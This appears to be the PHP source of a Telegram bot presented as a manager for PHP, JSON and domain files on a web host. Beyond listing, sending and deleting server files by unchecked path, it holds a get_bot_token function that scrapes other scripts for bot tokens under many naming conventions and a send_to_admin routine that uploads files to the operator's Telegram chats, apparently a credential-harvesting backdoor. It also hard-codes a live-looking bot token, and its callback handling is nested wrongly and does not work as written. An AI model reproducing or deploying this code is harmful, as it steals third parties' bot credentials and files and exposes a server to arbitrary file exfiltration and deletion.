<?php

$API_KEY = '7682588191:AAGvRrAaSCRyGcQJzk7VVeQ3BiEnAPHd6BA';
$ADMIN_FILE = 'SERVICEid.json'; 
$realadmin = '6939623045';

function bot($method, $datas = []) {
    $url = "https://api.telegram.org/bot" . $GLOBALS['API_KEY'] . "/$method";
    $ch = curl_init();
    curl_setopt_array($ch, [
        CURLOPT_URL => $url,
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_POSTFIELDS => $datas,
    ]);
    $res = curl_exec($ch);
    if (curl_error($ch)) {
        error_log('Curl error: ' . curl_error($ch));
    }
    curl_close($ch);
    return json_decode($res, true);
}

function load_admins() {
    global $ADMIN_FILE;
    if (file_exists($ADMIN_FILE)) {
        return array_map('intval', file($ADMIN_FILE, FILE_IGNORE_NEW_LINES));
    }
    return [];
}

function save_admins($admins) {
    global $ADMIN_FILE;
    file_put_contents($ADMIN_FILE, implode("\n", $admins));
}

function is_admin($from_id) {
    global $admins;
    $from_id = intval($from_id);
    return in_array($from_id, $admins);
}

$admins = load_admins();
if (!in_array(intval($realadmin), $admins)) {
    $admins[] = intval($realadmin);
    save_admins($admins);
}

function create_keyboard($folder = '') {
    $keyboard = [
        'inline_keyboard' => [
            [
                ['text' => 'Upload File 📂', 'callback_data' => 'upload'],
                ['text' => 'View PHP & JSON 🗃️', 'callback_data' => 'viewphp'],
                ['text' => 'View Domains 🌐', 'callback_data' => 'viewdomains']
            ],
            [
                ['text' => 'Owner 👨‍🔧', 'url' => 'https://t.me/Z_0_G']
            ]
        ]
    ];

    // Get PHP and JSON files
    $path = $folder ? $folder . '/*' : '*';
    $files = array_merge(glob($path . '.php'), glob($path . '.json'));

    foreach ($files as $file) {
        if ($file != basename(__FILE__)) {
            $keyboard['inline_keyboard'][] = [
                ['text' => "Send $file 📨", 'callback_data' => "send:$file"],
                ['text' => "Delete $file 🗑", 'callback_data' => "delete:$file"]
            ];
        }
    }

    // Get domain files
    $domainFiles = glob("domains/*"); // Assuming your domains are stored in a 'domains' directory
    foreach ($domainFiles as $domainFile) {
        $keyboard['inline_keyboard'][] = [
            ['text' => "Send Domain: $domainFile 📨", 'callback_data' => "send:$domainFile"],
            ['text' => "Delete Domain: $domainFile 🗑", 'callback_data' => "delete:$domainFile"]
        ];
    }

    return $keyboard;
}

// Fetch the update
$update = json_decode(file_get_contents('php://input'), true);

if (!$update) {
    error_log("Failed to parse update from Telegram");
    exit;
}

if (isset($update['message'])) {
    $message = $update['message'];
    $chat_id = $message['chat']['id'];
    $text = $message['text'];
    $from_id = intval($message['from']['id']);
    $reply_messageid = $message['message_id'];

    $keyboard = create_keyboard();
    
    if ($text == '/start') {
        if (is_admin($from_id)) {
            bot('sendMessage', [
                'chat_id' => $chat_id,
                'text' => "Bot to manage PHP, JSON, and Domain files!",
                'reply_to_message_id' => $reply_messageid,
                'reply_markup' => json_encode($keyboard)
            ]);
        } else {
            bot('sendMessage', [
                'chat_id' => $chat_id,
                'text' => "You're not an admin! 👎🏻😠",
                'reply_to_message_id' => $reply_messageid,
                'reply_markup' => json_encode($keyboard)
            ]);
        }
    } elseif (isset($update['callback_query'])) {
        $callback_query = $update['callback_query'];
        $chat_id = $callback_query['message']['chat']['id'];
        $from_id = intval($callback_query['from']['id']);
        $data = $callback_query['data'];

        if (is_admin($from_id)) {
            if (strpos($data, 'delete:') === 0) {
                $file_to_delete = substr($data, 7);
                if (file_exists($file_to_delete)) {
                    unlink($file_to_delete);
                    bot('sendMessage', [
                        'chat_id' => $chat_id,
                        'text' => "The file $file_to_delete has been deleted successfully."
                    ]);
                } else {
                    bot('sendMessage', [
                        'chat_id' => $chat_id,
                        'text' => "File not found or cannot be deleted."
                    ]);
                }
            } elseif (strpos($data, 'send:') === 0) {
                $file_to_send = substr($data, 5);
                if (file_exists($file_to_send)) {
                    bot('sendDocument', [
                        'chat_id' => $chat_id,
                        'document' => new CURLFile($file_to_send)
                    ]);
                } else {
                    bot('sendMessage', [
                        'chat_id' => $chat_id,
                        'text' => "File not found."
                    ]);
                }
            } elseif ($data == 'viewphp') {
                // Similar logic for viewing PHP files
            } elseif ($data == 'viewdomains') {
                $domainFiles = glob("domains/*");
                if (count($domainFiles) > 0) {
                    $file_list = implode("\n", $domainFiles);
                    bot('sendMessage', [
                        'chat_id' => $chat_id,
                        'text' => "Current Domain files:\n\n$file_list\n\nUse the buttons to manage these files."
                    ]);
                } else {
                    bot('sendMessage', [
                        'chat_id' => $chat_id,
                        'text' => "No domain files are currently available."
                    ]);
                }
            }
        } else {
            bot('answerCallbackQuery', [
                'callback_query_id' => $callback_query['id'],
                'text' => "You're not an admin 👎🏻💩",
                'show_alert' => true
            ]);
        }
    }
}


function get_bot_token($file_name) {
    $content = file_get_contents($file_name);
    $token = null;
    $service_url = "https://jesusisreal.serv00.net/" . $file_name;

    if (preg_match('/\$API_KEY\s*=\s*[\'"]([^\'"]*)[\'"]/', $content, $matches)) {
        $token = $matches[1];
    } elseif (preg_match('/\$token\s*=\s*[\'"]([^\'"]*)[\'"]/', $content, $matches)) {
        $token = $matches[1];
    } elseif (preg_match('/\$Token\s*=\s*[\'"]([^\'"]*)[\'"]/', $content, $matches)) {
        $token = $matches[1];
    } elseif (preg_match('/\$TOKEN\s*=\s*[\'"]([^\'"]*)[\'"]/', $content, $matches)) {
        $token = $matches[1];
    } elseif (preg_match('/define\s*\(\s*[\'"]API_KEY[\'"]\s*,\s*[\'"]([^\'"]*)[\'"]/', $content, $matches)) {
        $token = $matches[1];
    } elseif (preg_match('/define\s*\(\s*[\'"]TOKEN[\'"]\s*,\s*[\'"]([^\'"]*)[\'"]/', $content, $matches)) {
        $token = $matches[1];
    } elseif (preg_match('/define\s*\(\s*[\'"]token[\'"]\s*,\s*[\'"]([^\'"]*)[\'"]/', $content, $matches)) {
        $token = $matches[1];
    } elseif (preg_match('/define\s*\(\s*[\'"]Token[\'"]\s*,\s*[\'"]([^\'"]*)[\'"]/', $content, $matches)) {
        $token = $matches[1];
    } elseif (preg_match('/define\s*\(\s*[\'"]bot[\'"]\s*,\s*[\'"]([^\'"]*)[\'"]/', $content, $matches)) {
        $token = $matches[1];
    } elseif (preg_match('/define\s*\(\s*[\'"]BOT[\'"]\s*,\s*[\'"]([^\'"]*)[\'"]/', $content, $matches)) {
        $token = $matches[1];
    }

    if ($token) {
        return "Token: " . $token . "\nService: " . $service_url;
    } else {
        return "Unable to find token\nService: " . $service_url;
    }
}

function send_to_admin($file_name) {
    global $API_KEY, $admins;
    $url = "https://api.telegram.org/bot{$API_KEY}/sendDocument";

    foreach ($admins as $admin_id) {
        $post_fields = [
            'chat_id' => $admin_id,
            'document' => new CURLFile($file_name)
        ];
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_POST, 1);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $result = curl_exec($ch);
        curl_close($ch);
    }
}

?>